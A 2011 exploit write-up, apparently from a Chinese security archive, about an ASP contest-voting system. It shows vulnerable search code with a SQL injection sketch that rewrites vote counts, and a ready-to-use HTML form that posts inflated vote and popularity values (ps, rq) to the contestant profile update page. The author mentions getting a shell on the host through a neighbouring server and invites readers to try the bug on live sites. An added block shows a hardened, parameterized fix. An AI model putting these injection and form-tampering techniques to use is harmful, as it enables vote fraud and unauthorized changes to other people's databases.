A voting system bug that makes it possible to inflate votes and download counts

2011-12-17T00:00:00
ID MYHACK58:62201132612
Type myhack58
Reporter Anonymous
Modified 2011-12-17T00:00:00

Description

This article is not aimed at any particular event or site; this ASP voting system is used for many website events. The core code is the same everywhere, only the styling differs somewhat. I don't want everyone to go after sites in bulk, but if you occasionally run into an event like this you can try this BUG on it.

A classmate took part in a large talent contest (a CCTV event), and every day when I got on QQ I would see her messages asking for votes. Casting votes a few at a time does not get very far.

I then looked at the site: an ASP voting system, with checks on off-site GET requests, IP and time. In the end I went straight through the C-segment to get a shell, but that is not a long-term solution (you cannot add a lot of votes directly in the voting system because the administrators will notice, and the shell probably cannot be kept for long).

I downloaded the program to look through it. There are many upload points, but getting a shell through them could not be done, so I looked for injection and the like.

In the front-end search by name or number I found a point that is injectable.

t=Request("t")
key=Request("key")
Select case t
case "id":sql="Select * from xxx where sh=1 and id like '"&key&"' order by ps desc":msg="in accordance with the number:"&key&"sort"
case "name":sql="Select * from xxx where sh=1 and name like '"&key&"' order by ps desc":msg="in the name:"&key&"sort"
case else

As you can see, this leads directly to injection.

Something like "' and........ update xxxx set ps=8888 where id=888 " and so on: it ends the preceding statement and comments out the statement that follows.

Next, look at the update routine that runs after a contestant submits the profile edit page:

If Trim(Request.Form("ValidCode"))=Empty Or Trim(Session("cnbruce.com_ValidateCode"))<>Trim(Request.Form("ValidCode")) Then
Response.write("<script language='javascript'>alert('CAPTCHA error!'); history.back();</script>")
Response.end()
End if
sql="Select * from xxx where id="&Session("id")
Set rs=Server.CreateObject("ADODB.Recordset")
rs.Open sql,conn,1,3
putallrs(rs) ' I was also very surprised by this; see my earlier post, it is similar to the points rebate system
rs("video")=Request.Form("video")
rs.Update
rs.Close

The code above is very exciting. Member information, including the popularity value and the vote count, all sits in the same table, and the code above does no filtering.
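A hardened form of the two snippets above (the search query and the profile update), as an added example that is not code from the voting system or from the original article. It assumes conn is the open ADODB connection, that video is the only column a contestant may edit, and that putallrs copies every posted field into the row, as the behaviour described here implies; NewCmd is a hypothetical helper.

```vbscript
<%
' Added example, not the voting system's own code. Assumes conn is the open
' ADODB.Connection and that video is the only contestant-editable column
' (hypothetical allow-list; extend it to match the real schema).
Const adInteger = 3, adVarWChar = 202, adParamInput = 1, adCmdText = 1

' Hypothetical helper: build a command whose values travel as parameters,
' never as part of the SQL text.
Function NewCmd(sqlText)
    Dim c
    Set c = Server.CreateObject("ADODB.Command")
    Set c.ActiveConnection = conn
    c.CommandType = adCmdText
    c.CommandText = sqlText
    Set NewCmd = c
End Function

' 1) Search: fixed SQL per branch, key bound as a parameter.
Dim t, key, cmd, rs
t = Request("t")
key = Left(Trim(Request("key")), 50)
Select Case t
    Case "id"
        Set cmd = NewCmd("Select * from xxx where sh=1 and id like ? order by ps desc")
    Case "name"
        Set cmd = NewCmd("Select * from xxx where sh=1 and name like ? order by ps desc")
    Case Else
        ' Assumption: unknown search types are rejected outright.
        Response.Status = "400 Bad Request"
        Response.End
End Select
cmd.Parameters.Append cmd.CreateParameter("key", adVarWChar, adParamInput, 50, key)
Set rs = cmd.Execute

' 2) Profile update: name each editable column explicitly instead of copying
'    every posted field into the row, so ps and rq can never come from the form.
Dim video, upd
If Len(Session("id") & "") = 0 Or Not IsNumeric(Session("id")) Then Response.End
video = Left(Trim(Request.Form("video")), 255)
Set upd = NewCmd("Update xxx set video=? where id=?")
upd.Parameters.Append upd.CreateParameter("video", adVarWChar, adParamInput, 255, video)
upd.Parameters.Append upd.CreateParameter("id", adInteger, adParamInput, , CLng(Session("id")))
upd.Execute
%>
```

With the update written this way, extra ps or rq fields in a posted form are ignored, whether or not the page also checks for off-site submission.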

Next, save the form locally. The voting page vote_do.asp guards against off-site submission, but the contestant edit page does not. Right-click the page to view its source, strip out the clutter, and add two input lines, for popularity and number of votes.

The submission succeeded! (To capture this screenshot I got on QQ specially; the masking does not look good, and of course nothing is exposed.)

<form action="http://www.badguest.cn/View_do.asp" method="post" name="beauty_in" id="beauty_in" onsubmit="return(monitor());" >
<input name="ps" value="888888"/><input name="rq" value="8888888"/>
<td height="25" align="left" valign="middle"><span class="na">*</span>verification code:
<input name="ValidCode" />
<img id="chk" onclick="document.all.chk.src='';document.all.chk.src='http://www.2cto.com/Inc/ChkCode/validatecode.asp';" src="http://www.xxxxx.com/Inc/ChkCode/validatecode.asp" border="0" /><img src="Images/defaulting.gif" width="90" height="120" style=" display:none" /> <span style="cursor:hand; color:#0000CC;" onclick="document.all.chk.src='';document.all.chk.src='http://www.xxxxx.com/Inc/ChkCode/validatecode.asp';">can't see it?</span></td>
</tr>
<tr>
<td align="center"><input type="submit" value="submit" name="Submitok" />
<input type="reset" value="empty-refill" name="reset" /></td>
</tr>
</tbody>
</table>
</form>

The votes go straight up. I wonder whether the vote-brushing &......% companies add votes this way too (it requires the contestant to be logged in)?
